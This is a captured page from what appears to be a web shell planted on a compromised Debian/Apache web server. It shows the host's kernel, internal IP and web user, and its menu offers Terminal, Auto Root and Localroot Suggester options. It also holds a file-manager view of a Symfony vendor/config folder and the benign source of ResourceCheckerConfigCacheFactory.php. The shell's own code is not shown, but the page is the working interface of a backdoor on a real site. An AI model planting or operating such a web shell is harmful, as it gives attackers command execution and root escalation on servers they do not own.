Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.79
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
Builder
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Definition
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Exception
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Loader
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Resource
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Util
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
CHANGELOG.md
4.6
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCache.php
1.49
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheFactory.php
1.07
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheFactoryInterface.php
937
B
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheInterface.php
1.24
KB
-rwxrwxr-x
2026-02-24 17:34
FileLocator.php
2.68
KB
-rwxrwxr-x
2026-02-24 17:34
FileLocatorInterface.php
1.1
KB
-rwxrwxr-x
2026-02-24 17:34
LICENSE
1.04
KB
-rwxrwxr-x
2026-02-24 17:34
README.md
596
B
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerConfigCache.php
5.49
KB
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerConfigCacheFactory.php
1.04
KB
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerInterface.php
1.2
KB
-rwxrwxr-x
2026-02-24 17:34
composer.json
1.2
KB
-rwxrwxr-x
2026-02-24 17:34
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; /** * A ConfigCacheFactory implementation that validates the * cache with an arbitrary set of ResourceCheckers. * * @author Matthias Pigulla <mp@webfactory.de> */ class ResourceCheckerConfigCacheFactory implements ConfigCacheFactoryInterface { private iterable $resourceCheckers = []; /** * @param iterable<int, ResourceCheckerInterface> $resourceCheckers */ public function __construct(iterable $resourceCheckers = []) { $this->resourceCheckers = $resourceCheckers; } public function cache(string $file, callable $callable): ConfigCacheInterface { $cache = new ResourceCheckerConfigCache($file, $this->resourceCheckers); if (!$cache->isFresh()) { $callable($cache); } return $cache; } }